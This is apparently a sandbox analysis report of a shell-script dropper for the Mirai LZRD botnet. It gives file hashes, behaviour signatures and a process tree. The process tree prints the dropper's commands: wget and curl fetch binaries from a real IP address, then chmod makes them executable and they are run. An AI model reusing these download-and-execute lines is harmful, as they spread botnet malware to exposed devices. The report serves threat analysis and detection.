Overview

overview

10

Static

static

1

4c6c8e440a...621.sh

ubuntu-18.04-amd64

10

4c6c8e440a...621.sh

debian-9-armhf

10

4c6c8e440a...621.sh

debian-9-mips

10

4c6c8e440a...621.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    28-11-2024 02:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh

  • Size

    1KB

  • MD5

    ea3e4ce3ad906187d77f71fd511caca5

  • SHA1

    1826d8941b0d1aaa76fdade685e66e31e3732399

  • SHA256

    4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621

  • SHA512

    e9ac3561d6872982e7647f162635fe522c9abca8ca686d2f4853f62ae099c9b4a9f43076fc8f96ce2fc17d2dc02eb10067d811db34dc039c9a8761457830d9f7

Score
10/10
mirailzrdbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (17578) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
    /tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
    1⤵
    • Writes file to tmp directory
    PID:705
    • /usr/bin/wget
      wget http://154.216.20.149/bins/byte.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://154.216.20.149/bins/byte.x86
      2⤵
      • Writes file to tmp directory
      PID:720
    • /bin/cat
      cat byte.x86
      2⤵
        PID:732
      • /bin/chmod
        chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.x86 systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-ZiTqdl
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/byte
        ./byte byte.dvr
        2⤵
        • Executes dropped EXE
        PID:735
      • /bin/rm
        rm -rf byte
        2⤵
          PID:737
        • /usr/bin/wget
          wget http://154.216.20.149/bins/byte.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:739
        • /usr/bin/curl
          curl -O http://154.216.20.149/bins/byte.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:741
        • /bin/cat
          cat byte.mips
          2⤵
          • System Network Configuration Discovery
          PID:742
        • /bin/chmod
          chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.mips byte.x86 systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-ZiTqdl
          2⤵
          • File and Directory Permissions Modification
          PID:743
        • /tmp/byte
          ./byte byte.dvr
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Reads runtime system information
          PID:744
        • /bin/rm
          rm -rf byte
          2⤵
            PID:748

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/byte
          Filesize

          137KB

          MD5

          442269900f28ef10d8b7a13f2bc5ed86

          SHA1

          2f997966590600fb4b5572f306a40bcbb6fe79eb

          SHA256

          a1badb5317009fe55702c638b0c5816a92337e855e83db12e99e721db7b193c3

          SHA512

          d861babc3d83bf705aa5efd5276e928d6335eabfe58c604968315f865ae1765fe9b099b21de8045b3acfc6b66b5c384ec39888dd72d69bc4105703cff9e19db1

          Download Submit

        • /tmp/byte.x86
          Filesize

          95KB

          MD5

          34ef09c6bfa12c8bb0a4eb1111163f49

          SHA1

          374e5712df7fba870afd7c7897c5bc23ba205f61

          SHA256

          537907609ffc903d04b1aa5309d9bd02b95a31f343763ae83cd61f9c1b797438

          SHA512

          4aecdc6165268aa3a214581b5bb1311ebd17b9a7f573fc45a914fd3c1b7c38faffbe7ca21628ca37752417c8270a66fa34d544a4e315271f462dd31953bd902f

          Download Submit